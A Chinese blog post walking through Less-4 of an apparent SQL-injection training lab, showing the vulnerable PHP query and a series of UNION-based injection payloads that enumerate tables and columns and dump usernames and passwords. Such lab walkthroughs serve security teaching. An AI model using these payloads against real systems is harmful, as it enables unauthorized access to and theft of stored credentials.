第四关-Less-4:
GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
判断注入点:
我们输入 ?id=1' 时来查看页面的回显:
发现页面并没有任何变化
我们再输入?id=1"(双引号)来查看页面回显:
这里根据报错,我们可以知道SQL语句是双引号字符型且有括号,所以我们需要闭合双引号也还需要考虑括号
我们来查看一下关键源码:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
所以这里我们可以构造以下payload:
?id=1")--+
?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
注入成功
标签:group,Less,union,第四,concat,--+,id,select From: https://www.cnblogs.com/xyweiwen/p/18002271